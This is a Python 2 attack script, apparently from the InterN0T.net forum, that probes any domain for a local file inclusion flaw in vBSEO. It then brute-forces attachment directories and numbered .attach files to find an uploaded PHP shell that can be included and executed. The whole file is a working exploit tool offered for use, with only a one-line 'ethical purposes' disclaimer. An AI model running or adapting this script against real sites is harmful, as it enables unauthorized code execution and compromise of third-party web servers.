#!/usr/bin/python

#  ______          __                  __  __     __   ______   
# /\__  _\        /\ \__              /\ \/\ \  /'__`\/\__  _\  
# \/_/\ \/     ___\ \ ,_\    __   _ __\ \ `\\ \/\ \/\ \/_/\ \/  
#    \ \ \   /' _ `\ \ \/  /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \  
#     \_\ \__/\ \/\ \ \ \_/\  __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \ 
#     /\_____\ \_\ \_\ \__\ \____\\ \_\  \ \_\ \_\ \____/  \ \_\
#     \/_____/\/_/\/_/\/__/\/____/ \/_/   \/_/\/_/\/___/    \/_/
#      --------------------------------------------------------
#		Title:	vBSEO LFI Assistant Tool
#	       Author:	MaXe
#		 Site: 	http://www.intern0t.net
#
#	  Description: 	1) Checks whether the vBSEO installation
#			is patched or not. 2) Attempts to find
#			the physical location of an uploaded
#			attachment phile. (PHP Shell)
#
#	      Version:	2.2.3 - Multi-Threading! - Basic Version
#
#	      License:	-- Attribution-ShareAlike 3.0 Unported --
#			http://creativecommons.org/licenses/by-sa/3.0/
#
#		Notes:	Please note, that this tool does not work on
#			all types of hosts and you should therefore
#			modify this script to your own needs.
#			Multi-Threading in this tool is very buggy!
#
#	   Disclaimer:	This tool is meant for ethical purposes only.


# Import the appropriate libraries.
import os
import re
import httplib
import sys
import thread
import time

# Clear the screen in a sufficient way.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"
   
print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []

# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
	print "[+] Site is responding, this is good."
	if re.search("(<title>Enter text...</title>)", resp.read()):
		print ">> The site appears to be vulnerable!"
	else:
		print "[!] The site appears to be patched. (unknown error)"

elif resp.status == 404:
	print "[!] The site appears to be patched. (404)"


# Define a multi-threaded function for locating the attachment directory.
def findMainDir(target, array):
	global poss_main_dir
	conn = httplib.HTTPConnection(target, 80)
	print "[*] Trying: http://%s/%s/" % (target,array)
	conn.request("HEAD", "/%s/" % array)
	resp = conn.getresponse()
	
	# If the response code is 403 (Forbidden), set a new variable and continue.
	if resp.status == 403:
		print "[+] Directory found: /%s/" % array
		
		if poss_main_dir == []:
			poss_main_dir = ["%s" % array]
		else:
			poss_main_dir += ["%s" % array]
		
	conn.close()
	
# Define a multi-threaded function to scan for sub directories.
def findSubDir(target, array):
	global sub_dir
	i = 0
	print "[*] Trying subdirs within: http://%s/%s/" % (target,array)
	while i <= 9:
		conn = httplib.HTTPConnection(target, 80)
		conn.request("HEAD",  "/%s/%s/" % (array,i))
		resp = conn.getresponse()
		
		if resp.status == 403:
			print "[+] Sub Directory found: /%s/%s/" % (array,i)
			found = "%s/%s" % (array,i)
			
			if sub_dir == []:
				sub_dir = ["%s" % found]
			else:
				sub_dir += ["%s" % found]
				
		i=i+1
		conn.close()

# Define a multi-threaded function to find our phile.
# Developer Note: 	This function has a sub-function
#			(while) which could be multi-threaded
#			as well to speed up the process.
def findPhile(target,array):
	i = 99
	print "[*] Trying to find our file within: /%s/" % array
	while i >= 0:
		conn = httplib.HTTPConnection(target, 80)
		conn.request("HEAD", "/%s/%s.attach" % (array,i))
		resp = conn.getresponse()
		
		if resp.status == 200:
			print "[+] File found, does it match our keyword? >> %s" % file_match
			conn = httplib.HTTPConnection(target, 80)
			conn.request("GET", "/%s/%s.attach" % (array,i))
			resp = conn.getresponse()
			if re.search("(%s)" % file_match, resp.read()):
				print ">> File %s.attach contains our keyword!" % i
				print "Part URL: /%s/%s.attach" % (array,i)
				print "Full URL: http://" + target + "/%s/%s.attach \n" % (array,i)
				sys.exit(0)
				
		i=i-1
		conn.close()

# For each value in main_dir (array / list), start a new thread.
for value in main_dir[0:]:
	try:
		thread.start_new_thread(findMainDir, (newtarget,value))
		time.sleep(1)
	except KeyboardInterrupt:
		print "Quitting.."
		sys.exit()
	except:
		print "[!] Could not create any threads. Quitting.."
		sys.exit(1)

# Check if any values were assigned to the poss_main_dir array. If not, quit.
if poss_main_dir == []:
	print "[!] No directories were found, quitting."
	sys.exit()

for value in poss_main_dir[0:]:
	try:
		thread.start_new_thread(findSubDir, (newtarget,value))
		time.sleep(1)
	except KeyboardInterrupt:
		print "Quitting.."
		sys.exit()
	except:
		print "[!] Could not create any threads. Quitting.."
		sys.exit(1)

if sub_dir == []:
	print "[!] No sub directories were found, quitting."
	sys.exit()
	
for value in sub_dir[0:]:
	try:
		thread.start_new_thread(findPhile,(newtarget,value))
		time.sleep(1)
	except KeyboardInterrupt:
		print "Quitting.."
		sys.exit()
	except:
		print "[!] Could not create any threads. Quitting.."
		sys.exit(1)

try:
	print "Waiting for threads.."
	time.sleep(60)
except KeyboardInterrupt:
	print "Quitting.."
except:
	print "[!] Error"


# Don't forget, that this script can be used for more than one thing.